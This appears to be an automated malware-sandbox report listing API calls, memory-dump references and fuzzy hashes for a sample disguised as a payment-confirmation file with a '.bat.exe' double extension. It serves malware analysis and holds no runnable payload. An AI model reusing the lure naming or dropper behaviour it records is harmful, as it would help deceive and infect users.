                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                            • String ID:
                                                            • API String ID: 334405425-0
                                                            • Opcode ID: cd3871a4674ab2d20781c98e55c83c75f0414bc3aa5ab025748cc012411ec63e
                                                            • Instruction ID: d5d67dfdf4745362115819af7549d82072a8f7f049e0964222285d8f4f4a232d
                                                            • Opcode Fuzzy Hash: cd3871a4674ab2d20781c98e55c83c75f0414bc3aa5ab025748cc012411ec63e
                                                            • Instruction Fuzzy Hash: ED215031904108EADF11AFA5CE49A9E7A71FF44359F20413BF201B91E1CBBD8982AA5D
                                                            APIs
                                                            • GlobalFree.KERNEL32(00670348), ref: 00401C10
                                                            • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: Global$AllocFree
                                                            • String ID: Call
                                                            • API String ID: 3394109436-1824292864
                                                            • Opcode ID: 1123cc6a0f383144ca4e0a98b12c217c63afdee534dd3928be857bb34d6716f0
                                                            • Instruction ID: 755843c12eef3f61fe3821796784c52372e38f60d99e915cd62482290075d307
                                                            • Opcode Fuzzy Hash: 1123cc6a0f383144ca4e0a98b12c217c63afdee534dd3928be857bb34d6716f0
                                                            • Instruction Fuzzy Hash: 7D210872904254DBDB20FBA4CE84A5E73B8AB04718715093FF542F32D0C6B89C418BDD
                                                            APIs
                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
                                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,00000000,00000011,00000002), ref: 00402602
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: Enum$CloseValue
                                                            • String ID:
                                                            • API String ID: 397863658-0
                                                            • Opcode ID: 0dba00214060772b269aec70c88b8c4dcefe1b236ecbe69e4432b09e807f707b
                                                            • Instruction ID: 0e7c906900fe31acaf330cad7c7adc7318663c551a7f251ed3955534a0ac5e15
                                                            • Opcode Fuzzy Hash: 0dba00214060772b269aec70c88b8c4dcefe1b236ecbe69e4432b09e807f707b
                                                            • Instruction Fuzzy Hash: 3D017171904205ABEB149F949E58AAF7678FF40308F10443EF505B61C0DBB84E41976D
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(00008001,00000000,00000000,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 0040339B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                            • Instruction ID: 810e563441ec60ddb2e304251acab09d4dc6a46a8481b8ea59e7f14a092257d1
                                                            • Opcode Fuzzy Hash: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                            • Instruction Fuzzy Hash: E231B170200209BFDB129F59DD44E9A3FA9EB04355F10843AF904EA191D3788E51DBA9
                                                            APIs
                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                            • SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                            • Instruction ID: 4cdfa14fa51073ec67c7732ce5b449902c092ffb61bdcee16cd85da0f6320b18
                                                            • Opcode Fuzzy Hash: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                            • Instruction Fuzzy Hash: 0F01F4327212209BE7295B389D05B6B3698E710354F10863FF855F6AF1DA78CC429B4C
                                                            APIs
                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040245B
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402464
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: CloseDeleteValue
                                                            • String ID:
                                                            • API String ID: 2831762973-0
                                                            • Opcode ID: bb53019bc6b0262c1a7ba30a0e76d60d513ae05c0bd0953298f21ea634c4095c
                                                            • Instruction ID: 5f3bbf62c25f8db8e4007b741f5cecc6338069a28fa7be666feaa9c5da8c1564
                                                            • Opcode Fuzzy Hash: bb53019bc6b0262c1a7ba30a0e76d60d513ae05c0bd0953298f21ea634c4095c
                                                            • Instruction Fuzzy Hash: FCF06232A04520ABDB10BBA89A8DAEE62A5AF54314F11443FE542B71C1CAFC4D02976D
                                                            APIs
                                                            • CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C18
                                                            • GetLastError.KERNEL32 ref: 00405C26
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID:
                                                            • API String ID: 1375471231-0
                                                            • Opcode ID: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                            • Instruction ID: c951f985784cdd1ce4bfd292213bf749a6eab04c72170860fc3503b4537cd402
                                                            • Opcode Fuzzy Hash: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                            • Instruction Fuzzy Hash: 67F0F4B0C04209DAEB00CFA4D9487EFBBB4FB04309F00842AD541B6281DBB882488BA9
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                            • CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateHandleProcess
                                                            • String ID:
                                                            • API String ID: 3712363035-0
                                                            • Opcode ID: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
                                                            • Instruction ID: 40cf053be3b9956ee682ea3cdb0c0f8171e7446c395677da6238e6dd92eb787c
                                                            • Opcode Fuzzy Hash: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
                                                            • Instruction Fuzzy Hash: A4E0BFB4600219BFFB109B64EE49F7B7B7CEB00648F418425BD14F2551D77498149A7C
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3
                                                              • Part of subcall function 00406A06: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
                                                              • Part of subcall function 00406A06: wsprintfW.USER32 ref: 00406A58
                                                              • Part of subcall function 00406A06: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A6C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                            • String ID:
                                                            • API String ID: 2547128583-0
                                                            • Opcode ID: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                            • Instruction ID: b294046d3e4dddd9dd595f306a5883e4a37f4b9faaa0bea25d2c73fe5553ab8f
                                                            • Opcode Fuzzy Hash: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                            • Instruction Fuzzy Hash: DFE08636704610AAD610BA709E48C6773A89F86710302C83FF546F6140D738DC32AA79
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe,80000000,00000003), ref: 00406176
                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406198
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesCreate
                                                            • String ID:
                                                            • API String ID: 415043291-0
                                                            • Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                            • Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
                                                            • Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                            • Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15
                                                            APIs
                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36
                                                            • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405C44
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID:
                                                            • API String ID: 1375471231-0
                                                            • Opcode ID: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                            • Instruction ID: 9ee767d7bb24d12ef4013e29ffdbd8bf560f6e5ed3fd997729cc5c4a92c9c995
                                                            • Opcode Fuzzy Hash: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                            • Instruction Fuzzy Hash: 4EC08C30208601DAEA040B30DE08F073A50BB00340F214439A082E40A4CA308004CD2D
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028B4
                                                              • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: FilePointerwsprintf
                                                            • String ID:
                                                            • API String ID: 327478801-0
                                                            • Opcode ID: be6f6e28811eff9f61e37437ffce11e37693180493ed76b7cb4b0af79cd2cf68
                                                            • Instruction ID: a9a910f18d9475f192186a99a32baa3f0737176f8f71227260f04108cb8f5765
                                                            • Opcode Fuzzy Hash: be6f6e28811eff9f61e37437ffce11e37693180493ed76b7cb4b0af79cd2cf68
                                                            • Instruction Fuzzy Hash: CEE06D71A04108BFDB01ABA5BE499AEB3B9EB44354B20483FF102B00C8CA784D119A2D
                                                            APIs
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023EE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileStringWrite
                                                            • String ID:
                                                            • API String ID: 390214022-0
                                                            • Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                            • Instruction ID: 95154b02373db31601182c66ccc42c3a1d246cd64da090b0d32e859a1de181fa
                                                            • Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                            • Instruction Fuzzy Hash: 7DE04F31900524BADB5036B15ECDDBE20685FC8318B14063FFA12B61C2D9FC0C43466D
                                                            APIs
                                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E5C,00000000,?,?), ref: 00406546
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                            • Instruction ID: eb898ae1b777051f051c4ab58df26dcf4e878c8f9f4a5c47b005eb973d4bb03b
                                                            • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                            • Instruction Fuzzy Hash: 75E0E6B2010109BEEF095F50EC0AD7F371DE708710F11452EF906D4051E6B5E9309A39
                                                            APIs
                                                            • WriteFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,0040F4A1,0040CEF0,0040357E,0040CEF0,0040F4A1,00414EF0,00004000,?,00000000,004033A8,00000004), ref: 00406238
                                                            Memory Dump Source
